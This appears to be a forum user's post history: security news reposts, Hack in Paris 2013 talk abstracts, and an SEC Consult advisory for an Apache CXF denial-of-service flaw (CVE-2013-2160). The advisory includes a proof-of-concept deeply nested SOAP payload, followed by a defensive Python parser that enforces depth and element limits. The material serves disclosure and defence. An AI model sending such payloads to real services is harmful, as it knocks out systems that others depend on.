Everything posted by Matt
-
Microsoft claims that hackers have attacked a number of computers by exploiting a vulnerability in Internet Explorer 8, disclosed in May by a Google researcher. Google security engineer Tavis Ormandy published information about the vulnerability without notifying Microsoft beforehand, but the company issued a patch to fix the problem in the June Patch Tuesday security update. Microsoft offered few details about the attacks, but stated that hackers exploited the flaw to carry out targeted attacks, The Guardian reveals. Tavis Ormandy has had some trouble in this regard with Microsoft, which encourages researchers to disclose flaws responsibly, so that attackers do not exploit vulnerabilities before they are fixed. In June 2010, Ormandy announced a zero-day vulnerability in Windows XP and Windows Server 2003 and published an advisory that included exploit code, just five days after reporting the vulnerability to Microsoft. Nevertheless, the fact that the vulnerability is being exploited after the release of a security update highlights the importance of keeping all software up to date. Failure to patch software applications exposes computer systems to attacks that exploit known vulnerabilities, research shows. Keeping software up to date can provide 80% protection against cyber attacks, Secunia research analyst Stefen Frie explained to the audience at Infosec Europe 2012 in London. Source: ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
-
I don't know any Teava.
-
Description: Apache CXF versions prior to 2.5.10, 2.6.7, and 2.7.4 suffer from a denial of service vulnerability.
Author: A. Falkenberg, Joerg Schwenk, Juraj Somorovsky, Christian Mainka
Source: Apache CXF 2.5.10 / 2.6.7 / 2.7.4 Denial Of Service - Packet Storm
Code:

SEC Consult Vulnerability Lab Security Advisory < 20130709-0 >
=======================================================================
title: Denial of service vulnerability
product: Apache CXF
vulnerable version: Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4
fixed version: Apache CXF 2.5.10, 2.6.7 and 2.7.4 onwards
CVE number: CVE-2013-2160
impact: Critical
homepage: http://cxf.apache.org/
found: 2013-02-01
by: Andreas Falkenberg, SEC Consult Vulnerability Lab
Christian Mainka, Ruhr-University Bochum
Juraj Somorovsky, Ruhr-University Bochum
Joerg Schwenk, Ruhr-University Bochum
https://www.sec-consult.com
=======================================================================

Vendor/product description:
------------------------------------------------------------------------------
"Apache CXF is an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS. These services can speak a variety of protocols such as SOAP, XML/HTTP, RESTful HTTP, or CORBA and work over a variety of transports such as HTTP, JMS or JBI."
URL: http://cxf.apache.org/

Business recommendation:
------------------------------------------------------------------------------
Various denial of service attack vectors were found within Apache CXF. The recommendation of SEC Consult is to immediately perform an update.

Vulnerability overview/description:
------------------------------------------------------------------------------
It is possible to execute Denial of Service attacks on Apache CXF, exploiting the fact that the streaming XML parser does not put limits on things like the number of elements, number of attributes, the nested structure of the document received, etc. The effects of these attacks can vary from causing high CPU usage, to causing the JVM to run out of memory.
URL: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc

Proof of concept:
------------------------------------------------------------------------------
The following SOAP message will trigger a denial of service:

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <element>
      <element>
        <element>
          <element>
            [thousands more]
          </element>
        </element>
      </element>
    </element>
  </soap:Body>
</soap:Envelope>

There are various other XML payloads that will also trigger a denial of service on vulnerable services.

Vulnerable / tested versions:
------------------------------------------------------------------------------
This vulnerability affects all versions of Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4.

Vendor contact timeline:
------------------------------------------------------------------------------
2013-02-22: Advisory sent to vendor by Juraj Somorovsky (RUB)
2013-02-22: Advisory acknowledged by vendor
2013-04-19: Vendor confirms vulnerability
2013-05-15: Vendor publishes fixed version
2013-06-27: Vulnerability is disclosed by vendor
2013-07-09: SEC Consult releases security advisory

Solution:
------------------------------------------------------------------------------
CXF 2.5.x users should upgrade to 2.5.10 or later as soon as possible.
CXF 2.6.x users should upgrade to 2.6.7 or later as soon as possible.
CXF 2.7.x users should upgrade to 2.7.4 or later as soon as possible.
Also see the advisory of the vendor: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc

Workaround:
------------------------------------------------------------------------------
No workaround available.

Advisory URL:
------------------------------------------------------------------------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Andreas Falkenberg / @2013
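The root cause in the advisory is a streaming parser with no bound on nesting depth, element count or attribute count. As an added example (not from the advisory, and not Apache CXF's own code), the Python SAX handler below enforces such bounds while the document streams in, so a message shaped like the proof of concept is rejected after a few dozen elements instead of being read to the end; the limit values and the sample SOAP messages are constructed for this example.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class XmlLimitExceeded(Exception):
    """Raised from inside the SAX callbacks the moment a limit is crossed."""


class BoundedHandler(ContentHandler):
    """Streaming handler that enforces structural limits as the document arrives.

    The limits are hypothetical values chosen for this example, not CXF's
    settings. Because the checks run in startElement, a deeply nested message
    is rejected after max_depth + 1 elements rather than being buffered whole.
    """

    def __init__(self, max_depth=64, max_elements=10_000, max_attributes=50):
        super().__init__()
        self.max_depth = max_depth
        self.max_elements = max_elements
        self.max_attributes = max_attributes
        self.depth = 0            # current nesting level
        self.max_depth_seen = 0   # deepest level reached before stopping
        self.element_count = 0    # elements seen, including the rejected one

    def startElement(self, name, attrs):
        self.depth += 1
        self.element_count += 1
        self.max_depth_seen = max(self.max_depth_seen, self.depth)
        if self.depth > self.max_depth:
            raise XmlLimitExceeded(
                f"nesting depth {self.depth} exceeds {self.max_depth} at <{name}>")
        if self.element_count > self.max_elements:
            raise XmlLimitExceeded(
                f"element count {self.element_count} exceeds {self.max_elements}")
        if len(attrs) > self.max_attributes:
            raise XmlLimitExceeded(
                f"<{name}> carries {len(attrs)} attributes, limit {self.max_attributes}")

    def endElement(self, name):
        self.depth -= 1


def parse_bounded(xml_bytes, **limits):
    """Parse xml_bytes under the given limits.

    Returns (accepted, max_depth_seen, element_count, reason); reason is ""
    when the document was accepted.
    """
    handler = BoundedHandler(**limits)
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # Not the bug discussed in the advisory, but a parser fed untrusted SOAP
    # should not resolve external general entities either.
    parser.setFeature(feature_external_ges, False)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except XmlLimitExceeded as exc:
        return False, handler.max_depth_seen, handler.element_count, str(exc)
    return True, handler.max_depth_seen, handler.element_count, ""


SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"


def build_nested_soap(depth):
    """Constructed message with the advisory's shape: `depth` nested <element>s."""
    body = "<element>" * depth + "</element>" * depth
    return (f'<?xml version="1.0"?><soap:Envelope xmlns:soap="{SOAP_NS}">'
            f"<soap:Body>{body}</soap:Body></soap:Envelope>").encode()


def build_wide_soap(count):
    """Constructed message that is shallow but carries `count` sibling elements."""
    body = "<item/>" * count
    return (f'<?xml version="1.0"?><soap:Envelope xmlns:soap="{SOAP_NS}">'
            f"<soap:Body>{body}</soap:Body></soap:Envelope>").encode()


# Constructed ordinary request: Envelope > Body > GetQuote > Symbol (depth 4).
BENIGN_SOAP = (f'<?xml version="1.0"?><soap:Envelope xmlns:soap="{SOAP_NS}">'
               "<soap:Body><GetQuote><Symbol>ACME</Symbol></GetQuote>"
               "</soap:Body></soap:Envelope>").encode()


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_SOAP),
                       ("nested x5000", build_nested_soap(5000)),
                       ("wide x20000", build_wide_soap(20_000))]:
        accepted, depth, count, reason = parse_bounded(doc)
        print(f"{label:>13}: accepted={accepted} depth={depth} elements={count} {reason}")
```

The same idea applies to any streaming parser in front of a SOAP endpoint: reject on the first element that crosses a limit, and never let the limit depend on the document having been read in full.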
-
Hackers are exploiting a bug in Microsoft Windows that was originally disclosed by a Google researcher two months ago. Microsoft issued the warning in its latest security advisory, saying that without the patch fix hackers could theoretically use the flaw to increase their privileges, thus wrestling control of the device from the end user. The flaw was originally discovered and posted publicly online by Google security engineer Tavis Ormandy on the full disclosure blog in May. Ormandy said the bug relates to a "silly" piece of code from Microsoft, used in Windows 7 and Windows 8. It was unclear whether the flaw had been actively exploited by criminals prior to Ormandy's post, though Microsoft has since confirmed detecting numerous targeted attacks aimed at it. The details of the attacks and the potential damage caused remain unknown and at the time of publishing Microsoft had not responded to V3's request for comment. The post has since caused a heated debate about the nature of full disclosure within the security community. Experts that practice a full disclosure policy believe posting any security flaws they discover online to the public helps improve the world's security, forcing the parties involved to fix the flaws sooner rather than later. Others believe the practice is irresponsible as it alerts cyber criminals and black hats about the flaw before the company has had time to react. Ormandy is one of many Google engineers to support the full disclosure philosophy. Prior to his release, Google security engineers Chris Evans and Drew Hintz threw down a gauntlet to companies, saying they will give them just seven days to come clean on any zero day vulnerabilities they discover before making them public. Source: V3.co.uk
-
The Ministry of Defence (MoD) was the victim of a cyber espionage attack that led to the theft of key data, in the latest evidence of the sustained cyber threats facing the UK. The revelation comes from a report by the Intelligence and Security Committee (ISC) in its annual report to parliament, in which it revealed that the MoD confirmed the loss in the section on the cyber threats facing the UK. The report said: “Government departments are also targeted via attacks on industry suppliers, which may hold government information on their own systems. We have been told that cyber espionage ‘[has] resulted in MOD data being stolen'." V3 contacted the MoD for more information on the attack but had received no information at the time of publication. Not only this, but the ISC also reported that numerous government departments were hit by an attack in the summer of 2012 with 200 email accounts within 30 departments targeted. “In recent years, many government departments have come under cyber attack: often, this has involved websites being disrupted by denial-of-service attacks, and last summer over 200 email accounts across 30 government departments were targeted in an attempt to steal confidential information,” it said. The ISC said the government systems to protect against such attacks are “reasonably well developed” but there are still concerns over whether updates to key security tools and software are applied quickly enough to protect networks. Overall the ISC said such attacks underline the scale of the threat facing the UK and the need for the government to do all it can to protect against cybercrime. “The threat the UK is facing from cyber attacks is disturbing in its scale and complexity. The theft of intellectual property, personal details and classified information causes significant harm, both financial and non-financial,” it said. “It is incumbent on everyone – individuals, companies and the Government – to take responsibility for their own cyber security. We support the Government’s efforts to raise awareness and, more importantly, our nation’s defences.” As such it said that, while spending cuts in the defence budget were accepted, cyber security must remain a key priority for future resources. “Planning must begin now to ensure that resources will be made available to combat cyber attacks in the latter half of this decade, bearing in mind the resources our allies are putting into this area in recognition of the seriousness of the threat," it said. "The government must ensure that real progress is made as part of the wider National Cyber Security Strategy: the UK cannot afford not to keep pace with the cyber threat." Source: V3.co.uk
-
Pirate Bay Founder to Launch NSA-proof Messenger App
Matt replied to devianc3's topic in Security news
-
1. THE INNER HTML APOCALYPSE: HOW MXSS ATTACKS CHANGE EVERYTHING WE BELIEVED TO KNOW SO FAR
Description
This talk introduces and discusses a novel, mostly unpublished technique to attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its often unknown capabilities - every single one of them. We analyzed the type and number of websites that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to be understood and researched even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.

2. REMOTING ANDROID APPLICATIONS FOR FUN AND PROFIT
Description
Fino is a brand new tool we designed to perform dynamic Android application analysis in a pythonic and scriptable way. We ended up with a very powerful tool, allowing any reverse-engineer to remotely control any Android application, from its main component (user interface) to every internal and obscure class. This talk focuses on how Fino may make the Android reverse-engineer's life easier and how to use it to perform effective and powerful assessments on Android applications.
Summary of research: We recently presented and released a tool called Fino during the 29C3 event last December, which allows to dynamically and remotely interact with Android applications by injecting a small piece of code into them. We focused our presentation on how we designed this tool and quickly showed some cool features it provides us with. Fino is a brand new (and young) tool providing many ways to remotely interact with a target application installed on a smartphone or even in an emulator, and also a dedicated Python API. Android applications may be scripted, internal components remotely instantiated and used in a pythonic way and much more. With Fino, no need to understand how a protocol was designed and used by the application (and the remote server), just reuse the core components implemented in the application itself to get a working client in order to fuzz the server. With Fino, even text string obfuscation is useless since the methods retrieving the clear text strings may be called directly. Fino is a great and powerful tool to perform dynamic analysis of Android applications from a connected computer and to automate the whole process. This talk will not focus on the tool itself (even if Fino will be shortly presented) but more on the practical aspects of this tool from a reverse-engineer's point of view. That is, we will demonstrate how this tool may be used when performing Android application assessments, how this tool may help the reverse-engineer to solve some of the recurrent problems he encounters during his assessments and eventually how to improve the tool itself to fit his needs.

3. THE CONTROL OF TECHNOLOGY BY NATION STATE: PAST, PRESENT AND FUTURE - THE CASE OF CRYPTOLOGY AND INFORMATION SECURITY
Description
Since the end of WWII, strong controls have been enforced to prevent the spread of military-grade technology or dual use technologies and, since the end of the seventies, especially of Information Security science. The rise of the Internet phenomenon as well as the rise of terrorism make this control even stronger yet more subtle. Contrary to widespread belief, the freedom of technology and science is just an illusion. Recently the emerging hacker phenomenon has upset and thwarted this balance between the need of freedom and the need of State security requirements. The main issue lies in the fact that these controls originally focus on homeland and international security purposes (e.g. protection against terrorism or mafia activities). But the fall of the iron curtain and of the Soviet bloc has dramatically changed the rules of the game. The enforced controls aim at first organizing an economic dominance of a very few Nation States (e.g. G-8 countries) whose real intent is to organize the strategic dominance over the ever-growing technological societies. As an example (among many others), we could mention the case of Cisco vs Huawei/ZTE companies. Based on his own military experience and on his research work, the author is going to explain how this control has been and is organized and will explain the role of the four major actors: Nation State, Industry, Academics and Hackers. Without loss of generality, we will take the domain of cryptography and of network equipment as illustrating cases.

4. WINDOWS PHONE 8 APPLICATION SECURITY
Description
Microsoft is expanding its presence on the smartphone OS market. With the Windows Phone 8 release we got a brand new mobile operating system. Users got new devices and a lot of cool features (like NFC), and so did developers. The Windows Phone 8 platform allows creating applications with rich functionality, and for some of them the security issue is very important. In this presentation we want to summarize the Windows Phone 8 security model and talk about application security. This is important both for developers and security auditors. Also we will demo a tool that allows you to analyze Windows Phone applications. We will also show on real examples how to find vulnerabilities with this tool. Windows Phone 8 is a new mobile platform and there is not so much information about security issues out there. This presentation will cover the Windows Phone 8 security model. We will especially cover application security. During our research we examined a number of Windows Phone applications and learned where developers have to be careful when developing applications and where auditors may find vulnerabilities. Application analysis requires a number of tools, from generic tools like a disassembler to more specific tools like a .NET decompiler. There are a few tools targeting the Windows Phone 7 platform and applications, offering some features like decompiling, logging method calls and deploying an app to the Windows Phone emulator. But all of these features are basic and do not offer a lot, and none of these tools support Windows Phone 8 applications. During our work we created a tool that makes application analysis easier. It supports both Windows Phone 7 and 8 applications and offers a significant number of features that help to understand an application’s logic and find vulnerabilities. Auditors can use both static and dynamic analysis to achieve this. This is a logical continuation of our talk “Inspection of Windows Phone applications” at BlackHat. This presentation will be focused on Windows Phone 8 and application security.

5. ANALYSIS OF A WINDOWS KERNEL VULNERABILITY: FROM ESPIONAGE TO CRIMINAL USE
Description
A series of targeted attacks, now known as "Duqu", was discovered in 2011. The initial vector for these attacks was a Windows TrueType Font 0-day vulnerability [CVE-2011-3402]. A year later, this exploit begins to appear in Russian exploit kits. These exploit kits use the *exact* same exploit code as "Duqu". (Right down to the metadata.) This presentation explains the technical details of this exploit. It is not about "Duqu" nor Russian exploit kits. The vulnerability itself only allows the attacker to perform an "OR" operation on a value of their choice, at a memory location of their choice. This exploit leverages the functionality of the TrueType Font Finite State Machine itself to manipulate memory to provide for a reliable execution of the shellcode.
> Reason why this material is innovative or significant or an important tutorial.
It's an advanced kernel exploit, used in a real world targeted attack against a certain unnamed commercial or government entity. And now that very same kernel exploit is being used by criminals. The exploit technique is unique as well. I believe that it is the only exploit which uses the TrueType graphics operators to manipulate kernel memory into reliable, multi-platform, shellcode execution. (It even does sanity checks on itself to avoid a blue-screen of death.) The current draft of the presentation is already over 200 slides, but most of those are code walkthrough animations. I still need to add information about the similarities and differences between the original Duqu sample, and the current exploit kit. And details about the kernel shellcode. There are a bunch of slides about how to reverse engineer a kernel exploit, which I'll probably cut out for time. (And safe to assume audience already knows how?)

6. THE SECURITY OF MDM (MOBILE DEVICE MANAGEMENT) SYSTEMS
Description
More and more corporates are deploying mobile devices like smartphones and pads. To manage these devices, several solutions are available like MobileIron, Good Technology, Symantec and several others. I have installed and studied two of these solutions from a security point of view. More precisely, my goal was to determine if it is possible for the administrator of these solutions to steal data, to read mails of employees (and employers), etc. The results were very surprising as I discovered serious security defects in those products. During this presentation, I will share my experience with the audience: how I have set up the lab environment, the kind of tests I have made, how I discovered the vulnerabilities and which ones.

7. DBI FRAMEWORKS APPLIED TO COMPUTER SECURITY
Description
The main goal of this talk is to show how Dynamic Binary Instrumentation (DBI) works, and what it can be applied for in Computer Security. As proof of concept, it will be shown how DBI can be useful for detecting vulnerabilities (e.g., buffer overflow or taint analysis) in Windows executables. A DBI framework allows you to easily program a tool using DBI concepts. There are very different DBI frameworks on the market, each one has its advantages and disadvantages. In this talk, moreover, a performance analysis is shown comparing some DBI frameworks (namely, Pin, Valgrind and DynamoRIO). The main goal of this comparison is to be able to choose the best suitable DBI framework for each user, depending on his/her needs.
* Summary of the research: The main idea is to give a general overview of DBI, how it works, and its applicability to the Computer Security domain. Different known vulnerable source codes are going to be shown, and several tools using DBI are also shown proving how these vulnerabilities can be caught and reported. Finally, and as different DBI frameworks are available in the market, a performance analysis between the most-known DBI frameworks is shown. This work is the result of a collaboration with my PhD advisor, José Merseguer, and a former student of mine, who made his Final Degree Project on this topic, entitled 'Estudio comparativo de frameworks de Instrumentación Dinámica de Ejecutables' (in Spanish, sorry for that!) and that can be viewed here: Estudio comparativo de frameworks de instrumentación dinámica de ejecutables | Trabajos academicos - Repositorio Digital de la Universidad de Zaragoza http://webdiis.unizar.es/~ricardo/files/PFC.Estudio.Frameworks.DBI/Memoria_PFC_EstudioDBI.pdf The content of this talk has been recently presented at NoConName 2012, a Spanish security conference (more precisely, on 3rd November 2012).

8. BYOD: THE PRIVACY AND COMPLIANCE RISKS FROM BRINGING YOUR OWN MOBILE DEVICE TO WORK
Description
BYOD is a Disaster. It is a privacy fiasco. It will cause massive data breaches and privacy violations. PLUS - BYOD is more expensive than running two separate devices. This will be a highly charged debate on to BYOD or not… and is it worth the risk?

9. ORIGIN POLICY ENFORCEMENT IN MODERN BROWSERS
Description
The Same Origin Policy is the foremost security policy in all browsers. Like most browser code, it underwent a significant amount of changes to keep up with the recent development for HTML5. This talk covers the Same Origin Policy implemented in modern browsers. It goes into detail where browsers behave similarly and where differences occur. The presentation of noteworthy exceptions, regardless of whether they are intended or have evolved out of legacy features, is then followed by an analysis of previous flaws. We identify parsing mismatches as the key source of policy bypasses and suggest methods to analyze and test browser code with regard to this discovery. The talk also gives an outlook into things that may come and evaluates the origin as a measure to bind authority for HTML5 APIs. Using our methods we have also identified security issues in the Java Runtime Environment and Mozilla Firefox, which will be presented in the end.

10. THE REALEX PAYMENTS APPLICATION SECURITY STORY, NARRATED BY SECURITY NINJA
Description
As the old British Telecom adverts used to say, it's good to talk, so I thought now was a good time to talk about how we do application security at Realex Payments. Rather than just talk about where we are today, this talk will focus on the lessons learned over the past five years and what I'd do differently if I could do it all again. I will tell the story of how application security has worked and evolved in a fast growing technology company from the day we created our first application security role in the business to our current application security approach. The story will include how we scaled application security to keep up with the changes in a fast growing business, how playing card games with developers was one of the best things we've ever done and how following the KISS principle in the early days of an application security program is vital. You will see how we have progressed from having no dedicated application security resources to our current staffing levels and how our goals have evolved from simply security reviewing our applications to more grand goals such as wanting to provide free application security training for anyone in Ireland. This isn't an application security talk focusing on the theory and approaches that seem good on paper. You will have the opportunity to learn the lessons from five years of real world application security from the person who was at the centre of application security in Realex Payments. Following on from the success of Agnitio I will be releasing three new open source application security tools I have developed in this talk. These tools have helped improve application security reviews, reporting and visibility in Realex and I hope they will do the same for you! The Ninja News Daily said "5 stars! The Realex Payments Application Security story is a gripping story of one ninja's journey through five years of application security. Do not miss!"

11. MALWARE VS VIRTUALIZATION
Description
Virtualization tools play cat and mouse. Malware is studied in virtual environments, thus modifying its behavior to mimic inoffensive programs and avoid detection. It discovers more accurately its execution environment. Detection tools are stealthier, and try to be as close as possible to real hardware behavior. A technological breakthrough happened when malware became the hypervisor, and leveraged seamless virtualization. This paper analyzes the actual state of this race. Detection techniques and countermeasures are detailed. Virtualization leverages security tools' isolation and stealth. Malware is able to virtualize the whole operating system on the fly, and control all interactions with hardware without any hook. On the other side, it is a powerful tool to analyze process behaviors seamlessly. The virtualization detection race is far from ended. Malware research shows that some try to detect while others try to be as seamless as possible.
http://www.youtube.com/watch?feature=player_embedded&v=L-c22iQUG7k

12. ARE WE GETTING BETTER? - HACKING TODAY'S TECHNOLOGY
Description
Are we getting better as an industry? We have NextGen firewalls, APT prevention, DLP, and technology that can solve our technological needs from hackers. Why do we continue to see an increase in data breaches if the technology is working? Let's take a look at today's technology and hack it. This talk will cover some advanced techniques used to infiltrate a number of organizations during real world penetration tests. The talk will also discuss why these technologies fail us and why the reliance has to be on a proactive security strategy versus trying to patch it with a band aid. Let's find out if we are getting better or if it's the same old struggle. Hackers are here to stay; are we going to be able to withstand an attack?
http://www.youtube.com/watch?feature=player_embedded&v=lZmh8LuVDH4

13. NEXT GENERATION ROOTKITS FOR ARM BASED DEVICES
Description
Security of mobile operating systems is one of the most researched topics of today - iOS & co use mandatory code signing, ASLR and NX/DEP to make sure that no malicious code can be executed. While most attacks target the operating system itself, this talk will take a look at a new approach for mobile rootkits, using operating system independent hardware features of the CPU itself which make it almost impossible to be detected from the operating system.
http://www.youtube.com/watch?feature=player_embedded&v=8dYzv7_hKyE

14. I'M IN YOUR BROWSER, PWNING YOUR STUFF - ATTACKING GOOGLE CHROME EXTENSIONS
Description
Browser extensions can let you easily make notes, entertain you with a game, or take an annotated screenshot of the website you're visiting. They can also XSS any website you're visiting, harvest your browsing history, replace your cookies, silently change your proxy or execute code on your machine. Even benign, legitimate extensions can do this, just because they were poorly coded. These flaws are fairly common, and the attacks are easy. In this talk meterpreter sessions will be opened, Google will be XSSed, all your mailbox will belong to us and your PGP private keys will be extracted. But as constructing attack payloads is so boring, we'll present tools that help you find vulnerable extensions, confirm the vulnerabilities and exploit them. After the talk you'll be set to go to either attack Chrome extensions or code them properly as multiple code examples will be given.
Research summary: The presentation will consist of a technical overview of the Google Chrome extensions architecture, its built-in security mechanisms, including Content Security Policy to prevent XSS attacks. Focus will be given to bypassing the protections by leveraging poor extension coding, UI redressing attacks or side-channel attacks. I've developed a Chrome Extension Exploitation Framework - XSS CheF (https://github.com/koto/xsschef ) that gives a pentester the possibility to leverage flaws in extensions to conduct further attacks (the tool is similar to BeEF in that respect). Several flaws in popular Chrome extensions will be demonstrated, with varying consequences from universal XSS flaw to Remote Code Execution on the client's machine. Some of the research has been introduced in Black Hat USA 2012 workshops I've given with Kyle Osborn ( http://media.blackhat.com/bh-us-12/Briefings/Osborn/BH_US_12_Osborn_Koto... ), multiple other real-world examples have been added though, plus the research now focuses on exploiting extensions with v2 manifest, that are obligatorily protected by Content Security Policy.
http://www.youtube.com/watch?feature=player_embedded&v=ATJqa3Vvl_0

Source: HackinParis2013 // I'm definitely not sleeping tonight. Enjoy.
-
Hack in Paris 2013 - Analysis of a Windows Kernel Vulnerability
Matt replied to Matt's topic in Video tutorials
Here's this one.
-
Description: A series of targeted attacks, now known as "Duqu", was discovered in 2011. The initial vector for these attacks was a Windows TrueType Font 0-day vulnerability [CVE-2011-3402]. A year later, this exploit begins to appear in Russian exploit kits. These exploit kits use the *exact* same exploit code as "Duqu". (Right down to the metadata.) This presentation explains the technical details of this exploit. It is not about "Duqu" nor Russian exploit kits. The vulnerability itself only allows the attacker to perform an "OR" operation on a value of their choice, at a memory location of their choice. This exploit leverages the functionality of the TrueType Font Finite State Machine itself to manipulate memory to provide for a reliable execution of the shellcode.
> Reason why this material is innovative or significant or an important tutorial.
It's an advanced kernel exploit, used in a real world targeted attack against a certain unnamed commercial or government entity. And now that very same kernel exploit is being used by criminals. The exploit technique is unique as well. I believe that it is the only exploit which uses the TrueType graphics operators to manipulate kernel memory into reliable, multi-platform, shellcode execution. (It even does sanity checks on itself to avoid a blue-screen of death.) The current draft of the presentation is already over 200 slides, but most of those are code walkthrough animations. I still need to add information about the similarities and differences between the original Duqu sample, and the current exploit kit. And details about the kernel shellcode. There are a bunch of slides about how to reverse engineer a kernel exploit, which I'll probably cut out for time. (And safe to assume audience already knows how?)
For more information please visit: https://www.hackinparis.com
-
A report (PDF) released by the US Department of Commerce has revealed how one US agency, fuelled by the paranoia of a nation-state attack, spent US$2.7 million trying to destroy US$3 million worth of its own IT equipment, even though evidence of such an attack was never found. At the end of 2011, the United States Computer Emergency Readiness Team (US-CERT) advised the Department of Commerce's Computer Incident Response Team (DOC CIRT) that its systems may contain a malware infection. DOC CIRT shortly after narrowed this infection down to a network shared by the National Oceanic and Atmospheric Administration (NOAA), the US Economic Development Administration (EDA), and other US departments and agencies. While NOAA's response team had cleaned the infection by January 12, 2012, the warning instead placed EDA on high alert. To determine the extent of the perceived infection, EDA asked DOC CIRT to provide a listing of what IT components may have been potentially infected. This began a line of miscommunication into the severity of the infection, with DOC CIRT providing a list of 146 IT components that were simply within the network boundary. In fact, only two components were found to be infected. Although EDA was not equipped to handle the issue alone, DOC CIRT asked EDA to resolve the issue. EDA, believing that DOC CIRT had identified 146 cases of infection, fired back that it was unable to do so. From EDA's response, DOC CIRT believed that EDA had done the analysis to identify that all 146 components were infected, and thus both parties had then convinced each other of a widespread infection that actually did not exist. Its reaction to the perceived threat grew more extreme. By January 24, 2012, it had enlisted the help of US-CERT and the Department of Energy (DOE), and cut its email, website services, and access to its database applications off from the network. It instead requested the US Census Bureau to provide internet access and email services. 
Further paranoia about the possibility of the attack being conducted by nation-state actors resulted in EDA bringing on an external information security contractor to examine its systems in addition to the existing resources examining the issue. This contractor initially reported to EDA that it had found "indications of extremely persistent malware and suspicious activity", giving weight to the belief that a sophisticated attack was underway. However, US-CERT's report indicated at the time that although common malware was present, there was no evidence of any nation-state activity or the extremely persistent malware as first thought. Shortly after these reports were filed, EDA requested the help of the US National Security Agency (NSA), and a day later, DOE also filed its report, noting the same results as US-CERT — that there was no nation-state attack. A little less than two weeks after its initial report, the contractor reversed its position, admitting that its initial analysis had been wrong, and there was no evidence of a highly sophisticated attack. The situation was further confused by the Department of Homeland Security (DHS), however, which issued a report based on the inaccurate information provided by DOC CIRT that began the entire chain of miscommunication. The NSA later used DHS' report as fact, and did not attempt to verify whether the information was sound, despite finding no nation-state activity or persistent malware in its own analysis. Ultimately, only six components within EDA's IT infrastructure were found to be infected, and only by common malware. Given that its systems had been looked at by several government agencies and an external contractor, EDA believed that little was to be gained from further forensic analysis, and on May 15, 2012, decided to turn its focus onto cleaning its data. 
Still paranoid about the possibility of a nation-state attack despite the findings of several reports, EDA's CIO ordered the destruction of all of EDA's IT components. These components included desktops, printers, TVs, cameras, computer mice, and keyboards. Even laptops that had been purchased prior to the incident and had not ever been put into operation were included. By August 1, 2012, EDA had destroyed over US$170,000 worth of its infrastructure. It had only been prevented from destroying the remaining US$3 million worth as it had run out of funding for the operation, and the Commerce IT Review Board refused to approve the US$26 million it would need to continue its recovery operations. By that stage, however, EDA had spent US$823,000 on its external security contractor, US$1.061 million on temporary infrastructure, US$175,000 to destroy its equipment, and US$688,000 on external assistance for its recovery operations. In all, EDA spent US$2.7 million to combat an infection that had never existed. Source: Zdnet.Com My opinion: ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-
Keeping track of personal accounts and screen-names on the Internet is difficult. Did I use this handle from when I was in university or did I use the one that I adopted in my mid-20s? Wait, for this forum, was it the nickname I used when talking about techie topics or was it my fierce gamertag I want to intimidate folks with in multiplayer matches? Did this website utilize Facebook, Twitter, or Foursquare login, or did I register with my personal e-mail address and password? Aargh! When it comes to business accounts and identities, the ramifications of picking the right place of contact become much more important. Which online business identity do you want to prioritize, and how do you want people to talk about, label, and monitor your business? These days, it seems like businesses are encouraged to connect with their customers on as many platforms as possible. Not only do you need a website, you also need to be "in the conversation" via Twitter, broadcasting updates on Facebook, journaling your stories with a blog, sharing glamorized pictures over Instagram, pinning associated content on Pinterest, displaying your physical spot on Foursquare, and bonus points too if you're on Tumblr or Vine. But what do you want your customers to remember? The address to your Facebook page? The @name for Twitter, screen-name for Instagram, or your website's URL? Your business card will look like the world's busiest webpage if you stick all these links on it. So what's the one thing to highlight? Hashtag. I feel like small businesses need to be proactive and monitor what people are saying about them. Engage them rather than wait for them to figure out how to message you. If they're posting things on Facebook, Twitter, or Instagram and putting the appropriate hashtag, you should be able to find their content and respond accordingly. Proactive support and engagement can lead to increased sales and satisfaction. What's the key to figuring out what people are saying about you? 
Creating a natural hashtag and getting people to use it. Once content is posted with a hashtag, it should be easy for you to keep track of what's being said across all platforms. With my restaurants, I use the hashtags #standingsushibar and #tanukiraw. I put that on placemats and on business cards, and encourage folks to include those hashtags on their postings. So instead of needing people to remember the different IDs I have for different platforms, utilizing the hashtag would work across all. One hashtag to rule them all! Source: Zdnet.com
-
